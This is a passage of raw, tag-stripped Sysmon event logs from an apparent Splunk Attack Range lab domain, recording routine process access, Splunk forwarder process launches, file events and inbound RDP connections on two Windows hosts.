indows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8E86-6151-D900-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E86-6151-D900-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.925{5EBD8912-8E86-6151-D900-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.487{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6689EE89757CAAEC23E4FD6713DFF9F7,SHA256=CAE8633EC421E4F48DF409E769274C5B5713137FF461975060884FA99D155CD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:34.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E44E51D23A4AEB92881042050E923D9,SHA256=C97F972DA1736E8493012E8FA3B4992BC25E5E8A39C98770131B6AD2FEC9AA66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:31.284{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51829-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000982077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:30.544{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51354-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001057708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.440{5EBD8912-8E86-6151-D800-00000000FD01}58043144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E86-6151-D800-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E86-6151-D800-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.252{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E86-6151-D800-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.253{5EBD8912-8E86-6151-D800-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.112{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0CC0CC4E63646B69BE74DAEA6041C56,SHA256=B1CC96F695C092375642B630F3FFBD1F1530ED4B5A467E7976DB081A9815E927,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:32.722{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58116-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:35.721{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69D095994EE878E2516CD78A17FBC788,SHA256=F58A28BA7C1F3334A2DA13E020D4294CF8E0422E1503299FF228E7FE484D14C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:35.879{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA79DB9423A3F2BFEDBF433672E9F2E,SHA256=86D6317D7B1BD9A8728C55897AC53E75E16CE53AE54AAB114A9C07615C591685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:35.284{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B2EAB9C07ADEDF7F4B65FC034D90BE8,SHA256=3C408E262D32BBD85F8642821176572FD57EEAADBFC6D748B9EC62C402378EAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:35.143{5EBD8912-8E86-6151-D900-00000000FD01}59886112C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000982084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:36.895{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7481DA20EA5B4020E95AE6344FEEFBFE,SHA256=00557D0AED928B6BDE2C24062165B1B10D24D9127A7EE1834A102C10C666C97C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.956{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDDB4C4BB57C4EBB2C2449571A952596,SHA256=A857B44A409A807EAE0487FEE28A2BA26B0711B78DD6B571A6E4BBC6D7287FEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E88-6151-DA00-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E88-6151-DA00-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:36.596{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E88-6151-DA00-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 